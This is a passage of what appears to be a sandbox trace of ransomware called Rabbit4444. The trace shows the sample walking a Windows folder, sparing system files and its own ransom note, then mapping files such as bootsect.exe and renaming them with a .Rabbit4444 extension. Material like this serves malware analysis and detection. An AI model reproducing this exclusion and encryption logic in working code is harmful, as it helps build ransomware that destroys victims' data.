ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102450 [0043.024] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.024] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.024] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0043.024] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0043.025] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe2f5e3c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.025] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.025] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0043.025] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0043.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0043.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0043.025] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe2f5e3c5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe2f5e3c5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe2f845aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0043.025] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.025] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0043.025] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea35483d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea355be9, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.025] lstrcmpiW (lpString1="2052", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="Rabbit4444.exe") returned -1 [0043.025] lstrcmpiW (lpString1="2052", lpString2=".") returned 1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="..") returned 1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="windows") returned -1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="bootmgr") returned -1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="pagefile.sys") returned -1 [0043.025] lstrcmpiW (lpString1="2052", lpString2="boot") returned -1 [0043.026] lstrcmpiW (lpString1="2052", lpString2="ids.txt") returned -1 [0043.026] lstrcmpiW (lpString1="2052", lpString2="NTUSER.DAT") returned -1 [0043.026] lstrcpyW (in: lpString1=0x130eb60, lpString2="2052" | out: lpString1="2052") returned="2052" [0043.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0043.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102510 [0043.026] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf65b0 [0043.026] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3659ec, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3659ec, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x704c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appraiserxp.dll", cAlternateFileName="APPRAI~1.DLL")) returned 1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="Rabbit4444.exe") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2=".") returned 1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="..") returned 1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="windows") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="bootmgr") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="pagefile.sys") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="boot") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="ids.txt") returned -1 [0043.026] lstrcmpiW (lpString1="appraiserxp.dll", lpString2="NTUSER.DAT") returned -1 [0043.026] lstrcpyW (in: lpString1=0x130eb60, lpString2="appraiserxp.dll" | out: lpString1="appraiserxp.dll") returned="appraiserxp.dll" [0043.026] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\appraiserxp.dll", dwFileAttributes=0x0) returned 1 [0043.027] lstrlenW (lpString="appraiserxp.dll") returned 15 [0043.027] lstrlenW (lpString="Rabbit4444") returned 10 [0043.027] lstrcmpiW (lpString1="iserxp.dll", lpString2="Rabbit4444") returned -1 [0043.027] lstrlenW (lpString=".dll") returned 4 [0043.027] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0043.027] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea36cf08, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea36cf08, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x1cec8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootsect.exe", cAlternateFileName="")) returned 1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="Rabbit4444.exe") returned -1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2=".") returned 1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="..") returned 1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="windows") returned -1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="bootmgr") returned 1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="pagefile.sys") returned -1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="boot") returned 1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="ids.txt") returned -1 [0043.027] lstrcmpiW (lpString1="bootsect.exe", lpString2="NTUSER.DAT") returned -1 [0043.028] lstrcpyW (in: lpString1=0x130eb60, lpString2="bootsect.exe" | out: lpString1="bootsect.exe") returned="bootsect.exe" [0043.028] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\bootsect.exe", dwFileAttributes=0x0) returned 1 [0043.028] lstrlenW (lpString="bootsect.exe") returned 12 [0043.028] lstrlenW (lpString="Rabbit4444") returned 10 [0043.028] lstrcmpiW (lpString1="otsect.exe", lpString2="Rabbit4444") returned -1 [0043.028] lstrlenW (lpString=".dll") returned 4 [0043.028] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0043.028] lstrlenW (lpString=".lnk") returned 4 [0043.028] lstrcmpiW (lpString1=".exe", lpString2=".lnk") returned -1 [0043.028] lstrlenW (lpString=".ini") returned 4 [0043.028] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0043.028] lstrlenW (lpString=".sys") returned 4 [0043.028] lstrcmpiW (lpString1=".exe", lpString2=".sys") returned -1 [0043.028] CreateFileW (lpFileName="C:\\Windows10Upgrade\\bootsect.exe" (normalized: "c:\\windows10upgrade\\bootsect.exe"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0043.028] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0043.028] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13433919523) returned 1 [0043.028] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=118472) returned 1 [0043.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0xf0ff0 [0043.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0043.029] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d1d0, lpName=0x0) returned 0x280 [0043.030] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d1d0) returned 0x70000 [0043.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0043.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0043.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0043.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10ed48 [0043.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0043.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10ed48 | out: hHeap=0xe0000) returned 1 [0043.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0043.315] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13462534632) returned 1 [0043.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf0ff0 | out: hHeap=0xe0000) returned 1 [0043.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0043.315] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0043.316] CloseHandle (hObject=0x280) returned 1 [0043.316] CloseHandle (hObject=0x278) returned 1 [0043.321] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\bootsect.exe.Rabbit4444") returned 43 [0043.321] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\bootsect.exe" (normalized: "c:\\windows10upgrade\\bootsect.exe"), lpNewFileName="C:\\Windows10Upgrade\\bootsect.exe.Rabbit4444" (normalized: "c:\\windows10upgrade\\bootsect.exe.rabbit4444"), dwFlags=0x1) returned 1 [0043.321] InterlockedExchangeAdd (in: Addend=0xff618, Value=118480 | out: Addend=0xff618) returned 16 [0043.321] InterlockedExchangeAdd (in: Addend=0xff624, Value=286 | out: Addend=0xff624) returned 10 [0043.321] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea350dad, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea350dad, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xb08c3ee, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Configuration.ini", cAlternateFileName="CONFIG~1.INI")) returned 1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="Rabbit4444.exe") returned -1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2=".") returned 1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="..") returned 1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="windows") returned -1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="bootmgr") returned 1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="pagefile.sys") returned -1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="boot") returned 1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="ids.txt") returned -1 [0043.322] lstrcmpiW (lpString1="Configuration.ini", lpString2="NTUSER.DAT") returned -1 [0043.322] lstrcpyW (in: lpString1=0x130eb60, lpString2="Configuration.ini" | out: lpString1="Configuration.ini") returned="Configuration.ini" [0043.322] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\Configuration.ini", dwFileAttributes=0x0) returned 1 [0043.322] lstrlenW (lpString="Configuration.ini") returned 17 [0043.322] lstrlenW (lpString="Rabbit4444") returned 10 [0043.322] lstrcmpiW (lpString1="ration.ini", lpString2="Rabbit4444") returned 1 [0043.322] lstrlenW (lpString=".dll") returned 4 [0043.322] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0043.322] lstrlenW (lpString=".lnk") returned 4 [0043.323] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0043.323] lstrlenW (lpString=".ini") returned 4 [0043.323] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0043.323] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea36e29e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea36e29e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cosquery.dll", cAlternateFileName="")) returned 1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="Rabbit4444.exe") returned -1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2=".") returned 1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="..") returned 1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="windows") returned -1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="bootmgr") returned 1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="pagefile.sys") returned -1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="boot") returned 1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="ids.txt") returned -1 [0043.323] lstrcmpiW (lpString1="cosquery.dll", lpString2="NTUSER.DAT") returned -1 [0043.323] lstrcpyW (in: lpString1=0x130eb60, lpString2="cosquery.dll" | out: lpString1="cosquery.dll") returned="cosquery.dll" [0043.323] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\cosquery.dll", dwFileAttributes=0x0) returned 1 [0043.323] lstrlenW (lpString="cosquery.dll") returned 12 [0043.323] lstrlenW (lpString="Rabbit4444") returned 10 [0043.323] lstrcmpiW (lpString1="squery.dll", lpString2="Rabbit4444") returned 1 [0043.323] lstrlenW (lpString=".dll") returned 4 [0043.323] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0043.323] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea370998, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea370998, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x508c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DevInv.dll", cAlternateFileName="")) returned 1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="Rabbit4444.exe") returned -1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2=".") returned 1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="..") returned 1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="windows") returned -1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="bootmgr") returned 1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="pagefile.sys") returned -1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="boot") returned 1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="ids.txt") returned -1 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="NTUSER.DAT") returned -1 [0043.324] lstrcpyW (in: lpString1=0x130eb60, lpString2="DevInv.dll" | out: lpString1="DevInv.dll") returned="DevInv.dll" [0043.324] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DevInv.dll", dwFileAttributes=0x0) returned 1 [0043.324] lstrlenW (lpString="DevInv.dll") returned 10 [0043.324] lstrlenW (lpString="Rabbit4444") returned 10 [0043.324] lstrcmpiW (lpString1="DevInv.dll", lpString2="Rabbit4444") returned -1 [0043.324] lstrlenW (lpString=".dll") returned 4 [0043.324] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0043.324] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3757e9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea377ed3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea377ed3, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dll1", cAlternateFileName="")) returned 1 [0043.324] lstrcmpiW (lpString1="dll1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.324] lstrcmpiW (lpString1="dll1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.324] lstrcmpiW (lpString1="dll1", lpString2="Rabbit4444.exe") returned -1 [0043.324] lstrcmpiW (lpString1="dll1", lpString2=".") returned 1 [0043.324] lstrcmpiW (lpString1="dll1", lpString2="..") returned 1 [0043.325] lstrcmpiW (lpString1="dll1", lpString2="windows") returned -1 [0043.325] lstrcmpiW (lpString1="dll1", lpString2="bootmgr") returned 1 [0043.325] lstrcmpiW (lpString1="dll1", lpString2="pagefile.sys") returned -1 [0043.325] lstrcmpiW (lpString1="dll1", lpString2="boot") returned 1 [0043.325] lstrcmpiW (lpString1="dll1", lpString2="ids.txt") returned -1 [0043.325] lstrcmpiW (lpString1="dll1", lpString2="NTUSER.DAT") returned -1 [0043.325] lstrcpyW (in: lpString1=0x130eb60, lpString2="dll1" | out: lpString1="dll1") returned="dll1" [0043.325] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\dll1" | out: lpString1="C:\\Windows10Upgrade\\dll1") returned="C:\\Windows10Upgrade\\dll1" [0043.325] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\dll1\\") returned="C:\\Windows10Upgrade\\dll1\\" [0043.325] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll1\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" [0043.325] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\dll1\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0043.327] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0043.330] FlushFileBuffers (hFile=0x278) returned 1 [0043.331] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll1\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0043.331] CloseHandle (hObject=0x278) returned 1 [0043.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0043.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102950 [0043.332] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0xf63b0 | out: ListHead=0xf6750, ListEntry=0xf63b0) returned 0x0 [0043.332] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea37cd05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37cd05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea37cd05, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dll2", cAlternateFileName="")) returned 1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="Rabbit4444.exe") returned -1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2=".") returned 1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="..") returned 1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="windows") returned -1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="bootmgr") returned 1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="pagefile.sys") returned -1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="boot") returned 1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="ids.txt") returned -1 [0043.332] lstrcmpiW (lpString1="dll2", lpString2="NTUSER.DAT") returned -1 [0043.332] lstrcpyW (in: lpString1=0x130eb60, lpString2="dll2" | out: lpString1="dll2") returned="dll2" [0043.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0043.332] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102990 [0043.332] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6510 [0043.332] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea380798, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea380798, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x326c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="downloader.dll", cAlternateFileName="DOWNLO~1.DLL")) returned 1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="Rabbit4444.exe") returned -1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2=".") returned 1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="..") returned 1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="windows") returned -1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="bootmgr") returned 1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="pagefile.sys") returned -1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="boot") returned 1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="ids.txt") returned -1 [0043.332] lstrcmpiW (lpString1="downloader.dll", lpString2="NTUSER.DAT") returned -1 [0043.333] lstrcpyW (in: lpString1=0x130eb60, lpString2="downloader.dll" | out: lpString1="downloader.dll") returned="downloader.dll" [0043.333] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\downloader.dll", dwFileAttributes=0x0) returned 1 [0043.333] lstrlenW (lpString="downloader.dll") returned 14 [0043.333] lstrlenW (lpString="Rabbit4444") returned 10 [0043.333] lstrcmpiW (lpString1="loader.dll", lpString2="Rabbit4444") returned -1 [0043.333] lstrlenW (lpString=".dll") returned 4 [0043.333] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0043.333] FindNextFileW (in: hFindFile=0x102450, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea381b2a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea381b2a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x9d2c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="Rabbit4444.exe") returned -1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2=".") returned 1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="..") returned 1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="windows") returned -1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="bootmgr") returned 1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="pagefile.sys") returned -1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="boot") returned 1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="ids.txt") returned -1 [0043.334] lstrcmpiW (lpString1="DW20.EXE", lpString2="NTUSER.DAT") returned -1 [0043.334] lstrcpyW (in: lpString1=0x130eb60, lpString2="DW20.EXE" | out: lpString1="DW20.EXE") returned="DW20.EXE" [0043.334] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\DW20.EXE", dwFileAttributes=0x0) returned 1 [0043.334] 